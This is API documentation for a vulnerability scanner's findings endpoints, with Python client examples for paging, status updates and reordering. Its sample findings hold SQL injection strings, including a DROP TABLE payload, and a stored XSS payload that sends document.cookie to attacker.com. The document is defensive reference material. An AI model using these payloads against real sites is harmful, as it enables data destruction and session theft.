Findings

View and manage vulnerability findings

GET /v1/scans/:scanId/findings

List findings for a scan

Retrieve a paginated list of vulnerability findings discovered during a scan. Findings can be filtered by severity level and user-assigned status. Results are ordered by severity (critical first) then by position.

Path Parameters

Name    Type    Description
scanId  string  Scan ID (UUIDv7). Required.

Query Parameters

Name        Type    Description
page        number  Page number for pagination. Default: 1.
limit       number  Number of results per page (max 100). Default: 20.
severity    string  Filter by severity level. One of: critical, high, medium, low, info.
userStatus  string  Filter by user-assigned status. One of: open, in_progress, fixed, accepted_risk, false_positive.

Example Request

bash
curl -X GET "https://apviso.com/api/v1/v1/scans/:scanId/findings" \
  -H "X-API-Key: apvk_your_key_here"

Response

Returns a paginated list of findings with full vulnerability details: CVSS 3.1 score and vector, CWE classification, evidence, reproduction steps, and remediation guidance. The `evidence` and `reproduction` fields carry the raw payloads the scanner used (the stored XSS example below contains a literal `<script>` tag), so treat them as untrusted input and encode them before rendering them in a dashboard or report.

json
{
  "data": [
    {
      "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "SQL Injection in /api/users endpoint",
      "severity": "critical",
      "cvssScore": 9.8,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "cweId": "CWE-89",
      "description": "The /api/users endpoint is vulnerable to SQL injection through the `sort` query parameter. An unauthenticated attacker can extract the full database contents, modify data, or execute operating system commands.",
      "evidence": "GET /api/users?sort=name%27%3B+DROP+TABLE+users%3B-- returned a 500 error with SQL error details in the response body.",
      "reproduction": [
        "Send a GET request to /api/users?sort=name' OR 1=1--",
        "Observe the response returns all user records regardless of authorization",
        "Confirm with time-based payload: /api/users?sort=name'; WAITFOR DELAY '0:0:5'--"
      ],
      "remediation": "Use parameterized queries or an ORM for all database operations. Validate and sanitize the `sort` parameter against an allowlist of column names.",
      "affectedUrl": "https://example.com/api/users",
      "agent": "scanner",
      "userStatus": "open",
      "position": 1,
      "createdAt": "2026-04-10T10:45:18Z",
      "updatedAt": "2026-04-10T10:45:18Z"
    },
    {
      "id": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "Cross-Site Scripting (Stored XSS) in user profile",
      "severity": "high",
      "cvssScore": 8.1,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
      "cweId": "CWE-79",
      "description": "The user profile bio field does not sanitize HTML input. Stored XSS payloads execute in the context of any user viewing the profile, enabling session hijacking and account takeover.",
      "evidence": "Setting the bio field to <script>fetch(\"https://attacker.com/steal?c=\"+document.cookie)</script> results in script execution when the profile is viewed.",
      "reproduction": [
        "Navigate to /settings/profile",
        "Enter <img src=x onerror=alert(document.domain)> in the bio field",
        "Save the profile and view it in another browser session",
        "Observe the JavaScript alert fires with the domain"
      ],
      "remediation": "Sanitize all user-generated HTML content using a library like DOMPurify. Implement Content-Security-Policy headers to mitigate impact.",
      "affectedUrl": "https://example.com/settings/profile",
      "agent": "scanner",
      "userStatus": "open",
      "position": 2,
      "createdAt": "2026-04-10T10:48:33Z",
      "updatedAt": "2026-04-10T10:48:33Z"
    }
  ],
  "pagination": {
    "page": 1,
    "limit": 20,
    "total": 21,
    "totalPages": 2
  }
}
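The pagination described above, worked through in a small client that walks every page of a scan, validates the documented filter values before sending them, and tallies findings by severity. This is an added example, not Apviso's own client code: it assumes the base URL `https://apviso.com/api/v1`, the `X-API-Key` header and the `page`/`limit`/`severity`/`userStatus` parameters exactly as documented, and it injects the HTTP transport so the paging logic can be exercised offline against constructed responses.

```python
"""Walk every page of GET /v1/scans/:scanId/findings and tally by severity.

Added example, not Apviso's own client code. Assumptions: the base URL
https://apviso.com/api/v1, the X-API-Key header and the page/limit/severity/
userStatus parameters as documented. The HTTP transport is injected so the
paging logic runs offline against constructed responses.
"""
import json
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterator, List, Optional

BASE_URL = "https://apviso.com/api/v1"  # assumption: base URL for the documented paths
SEVERITIES = ("critical", "high", "medium", "low", "info")
USER_STATUSES = ("open", "in_progress", "fixed", "accepted_risk", "false_positive")
MAX_LIMIT = 100  # documented upper bound for `limit`

Transport = Callable[[str], dict]  # GET url -> decoded JSON body


def http_transport(api_key: str) -> Transport:
    """Live transport: GET with the X-API-Key header, decode the JSON body."""
    def get(url: str) -> dict:
        req = urllib.request.Request(url, headers={"X-API-Key": api_key})
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    return get


def findings_url(scan_id: str, page: int = 1, limit: int = MAX_LIMIT,
                 severity: Optional[str] = None,
                 user_status: Optional[str] = None) -> str:
    """Build the list URL, refusing filter values outside the documented enums
    and a limit outside 1..100, so a typo fails locally instead of as a 4xx."""
    if severity is not None and severity not in SEVERITIES:
        raise ValueError(f"unknown severity {severity!r}")
    if user_status is not None and user_status not in USER_STATUSES:
        raise ValueError(f"unknown userStatus {user_status!r}")
    if not 1 <= limit <= MAX_LIMIT:
        raise ValueError(f"limit must be between 1 and {MAX_LIMIT}")
    params: Dict[str, object] = {"page": page, "limit": limit}
    if severity:
        params["severity"] = severity
    if user_status:
        params["userStatus"] = user_status
    path = f"/scans/{urllib.parse.quote(scan_id, safe='')}/findings"
    return f"{BASE_URL}{path}?{urllib.parse.urlencode(params)}"


def iter_findings(transport: Transport, scan_id: str, limit: int = MAX_LIMIT,
                  **filters) -> Iterator[dict]:
    """Yield every finding, following pagination.totalPages. An empty `data`
    page also ends the walk, so a stale totalPages cannot spin forever."""
    page = 1
    while True:
        body = transport(findings_url(scan_id, page, limit, **filters))
        data = body.get("data", [])
        if not data:
            return
        yield from data
        if page >= int(body["pagination"]["totalPages"]):
            return
        page += 1


def severity_counts(transport: Transport, scan_id: str, **filters) -> Dict[str, int]:
    """Tally findings per severity across all pages."""
    counts = {s: 0 for s in SEVERITIES}
    for finding in iter_findings(transport, scan_id, **filters):
        counts[finding["severity"]] += 1
    return counts


# Constructed sample data shaped like the documented response (not real scan output).
SAMPLE_FINDINGS: List[dict] = [
    {"id": "f1", "severity": "critical", "userStatus": "open", "title": "SQLi"},
    {"id": "f2", "severity": "high", "userStatus": "open", "title": "Stored XSS"},
    {"id": "f3", "severity": "high", "userStatus": "fixed", "title": "Reflected XSS"},
    {"id": "f4", "severity": "medium", "userStatus": "accepted_risk", "title": "Verbose errors"},
    {"id": "f5", "severity": "info", "userStatus": "open", "title": "Server banner"},
]


def constructed_transport(findings: List[dict]) -> Transport:
    """Offline stand-in for the API: applies the severity/userStatus filters and
    pages the constructed findings in the documented response shape."""
    def get(url: str) -> dict:
        q = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
        page = int(q.get("page", ["1"])[0])
        per = int(q.get("limit", [str(MAX_LIMIT)])[0])
        subset = [f for f in findings
                  if all(f.get(k) == v[0] for k, v in q.items() if k in ("severity", "userStatus"))]
        total = len(subset)
        return {"data": subset[(page - 1) * per: page * per],
                "pagination": {"page": page, "limit": per, "total": total,
                               "totalPages": max(1, -(-total // per))}}
    return get


if __name__ == "__main__":
    # Offline run: page size 2 forces three round trips over the five samples.
    print(severity_counts(constructed_transport(SAMPLE_FINDINGS), "scan-id", limit=2))
    # Live run would be: severity_counts(http_transport("apvk_..."), "<scanId>")
```

Stopping on an empty `data` array as well as on `totalPages` is deliberate: findings can change status (and so drop out of a filtered view) while a walk is in progress, and a client that trusts only the page count it saw on page 1 can otherwise request pages that no longer exist.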

PATCH /v1/scans/:scanId/findings/:findingId/status

Update finding status

Update the user-assigned status of a finding. Use this to track your remediation progress. Status changes are reflected in compliance posture calculations and report generation.

Path Parameters

Name       Type    Description
scanId     string  Scan ID (UUIDv7). Required.
findingId  string  Finding ID (UUIDv7). Required.

Request Body

Name        Type    Description
userStatus  string  New status for the finding. Required. One of: open, in_progress, fixed, accepted_risk, false_positive.

Example Request

bash
curl -X PATCH "https://apviso.com/api/v1/v1/scans/:scanId/findings/:findingId/status" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "userStatus": "in_progress"
}'

Response

Returns the finding ID with the updated status and timestamp.

json
{
  "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
  "userStatus": "in_progress",
  "updatedAt": "2026-04-10T15:22:08Z"
}

PATCH /v1/scans/:scanId/findings/reorder

Reorder findings

Update the display order of findings within a scan. Use this to customize the priority ordering in your reports and dashboard views. Positions are zero-indexed integers.

Path Parameters

Name    Type    Description
scanId  string  Scan ID (UUIDv7). Required.

Request Body

Name       Type   Description
positions  array  Array of objects with `findingId` (string) and `position` (number) specifying the new order. Required.

Example Request

bash
curl -X PATCH "https://apviso.com/api/v1/v1/scans/:scanId/findings/reorder" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "positions": [
    {
      "findingId": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "position": 0
    },
    {
      "findingId": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "position": 1
    },
    {
      "findingId": "019414ca-c3d4-7e5f-a6b7-8c9d0e1f2a3b",
      "position": 2
    }
  ]
}'

Response

Returns a confirmation with the number of findings whose positions were updated.

json
{
  "message": "Findings reordered successfully",
  "updated": 3
}
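The status update and reorder requests above, built by a small triage helper rather than by hand-edited curl commands. This is an added example, not Apviso's own client code: it assumes the base URL `https://apviso.com/api/v1` and the request bodies documented on this page, and it applies an ordering policy chosen for the example (CVSS score descending, then severity, then title) to produce the zero-indexed `positions` array. The sample findings reuse the ids shown on this page; the third entry's title and score are constructed.

```python
"""Build the PATCH requests for the status and reorder endpoints.

Added example, not Apviso's own client code. Assumptions: the base URL
https://apviso.com/api/v1, the request bodies documented on this page, and an
example triage policy (order by CVSS score, then severity, then title). The
sample findings reuse ids from this page; the third title/score is constructed.
"""
import json
import urllib.parse
import urllib.request
from typing import List

BASE_URL = "https://apviso.com/api/v1"  # assumption: base URL for the documented paths
USER_STATUSES = ("open", "in_progress", "fixed", "accepted_risk", "false_positive")
SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}


def _path(scan_id: str, *parts: str) -> str:
    """Percent-encode every path segment so an id can never alter the route."""
    segs = [urllib.parse.quote(p, safe="") for p in (scan_id, *parts)]
    return f"{BASE_URL}/scans/{segs[0]}/findings" + "".join("/" + s for s in segs[1:])


def status_request(scan_id: str, finding_id: str, user_status: str) -> dict:
    """PATCH /v1/scans/:scanId/findings/:findingId/status.
    Rejects any status outside the documented enum before it reaches the API."""
    if user_status not in USER_STATUSES:
        raise ValueError(f"unknown userStatus {user_status!r}; expected one of {USER_STATUSES}")
    return {"method": "PATCH", "url": _path(scan_id, finding_id, "status"),
            "body": {"userStatus": user_status}}


def reorder_request(scan_id: str, findings: List[dict]) -> dict:
    """PATCH /v1/scans/:scanId/findings/reorder with zero-indexed positions.
    Example policy: CVSS score descending, then severity, then title.
    Duplicate ids would make the positions array ambiguous, so they are rejected."""
    ordered = sorted(findings, key=lambda f: (-float(f.get("cvssScore") or 0.0),
                                              SEVERITY_RANK.get(f["severity"], len(SEVERITY_RANK)),
                                              f.get("title", "")))
    ids = [f["id"] for f in ordered]
    if len(set(ids)) != len(ids):
        raise ValueError("duplicate finding ids in reorder payload")
    positions = [{"findingId": fid, "position": i} for i, fid in enumerate(ids)]
    return {"method": "PATCH", "url": _path(scan_id, "reorder"),
            "body": {"positions": positions}}


def send(request: dict, api_key: str) -> dict:
    """Send a built request with urllib (live only; not exercised offline)."""
    req = urllib.request.Request(request["url"], method=request["method"],
                                 data=json.dumps(request["body"]).encode(),
                                 headers={"X-API-Key": api_key,
                                          "Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


# Constructed sample: ids from this page; the third title and all scores are example values.
SCAN_ID = "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c"
SAMPLE_FINDINGS: List[dict] = [
    {"id": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a", "severity": "high", "cvssScore": 8.1,
     "title": "Cross-Site Scripting (Stored XSS) in user profile"},
    {"id": "019414ca-c3d4-7e5f-a6b7-8c9d0e1f2a3b", "severity": "high", "cvssScore": 7.5,
     "title": "Constructed third finding"},
    {"id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f", "severity": "critical", "cvssScore": 9.8,
     "title": "SQL Injection in /api/users endpoint"},
]

if __name__ == "__main__":
    print(json.dumps(reorder_request(SCAN_ID, SAMPLE_FINDINGS)["body"], indent=2))
    print(status_request(SCAN_ID, SAMPLE_FINDINGS[2]["id"], "in_progress"))
    # Live: send(reorder_request(SCAN_ID, SAMPLE_FINDINGS), "apvk_your_key_here")
```

Because `accepted_risk` and `false_positive` remove a finding from the remediation queue and feed into compliance posture, the helper validates the status locally so that a mistyped value fails before the request is sent rather than being silently rejected or, worse, accepted by a lenient server.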